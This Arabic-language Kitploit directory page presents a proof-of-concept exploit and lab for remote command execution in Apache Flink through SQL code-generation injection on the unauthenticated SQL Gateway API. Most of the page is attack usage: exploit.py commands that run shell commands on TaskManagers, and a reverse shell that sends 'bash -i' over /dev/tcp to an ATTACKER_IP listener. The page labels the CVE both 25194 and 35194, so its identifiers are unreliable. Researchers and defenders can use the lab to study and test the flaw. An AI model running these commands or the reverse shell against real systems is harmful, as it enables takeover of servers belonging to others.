Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25194 — إثبات المفهوم لاستغلال وبيئة مختبرية لـ CVE-2026-25194 | Kitploit
أدوات/GitHubGitHub/dexsemon/cve-2026-25194
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

إثبات المفهوم لاستغلال وبيئة مختبرية لـ CVE-2026-25194

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-35194 — حقن كود SQL في Apache Flink

تنفيذ أوامر عن بُعد على عُقد Apache Flink TaskManagers عبر حقن توليد كود SQL.

CVECVE-2026-35194
CVSS8.1 (عالٍ)
CWECWE-94 — حقن كود
الإصدارات المتأثرةFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
الإصدارات المُصحَّحة1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
سطح الهجومSQL Gateway REST API (المنفذ الافتراضي 8083، بدون مصادقة)

بدء سريع

1. نشر بيئة الاختبار المعرضة للثغرة

root@kitploit:~
docker compose up -d

انتظر حوالي 30 ثانية حتى تبدأ المجموعة. تظهر خدمتان:

  • واجهة Flink Web — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

للتحقق:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# يجب أن يُرجع الإصدار "1.20.3"

2. تثبيت المتطلبات

root@kitploit:~
pip install requests

3. الاستغلال

متجه JSON:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

متجه LIKE:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

فحص الإصدار فقط (بدون تنفيذ أوامر):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

التحقق من تنفيذ الأوامر على TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. قشرة عكسية

root@kitploit:~
# الطرفية 1 — المُستمِع
nc -lvnp 4444

# الطرفية 2 — الاستغلال
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

الاستخدام

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

إخلاء مسؤولية

لأغراض البحث الأمني المصرح به والتعليم فقط.

تنزيل الأداة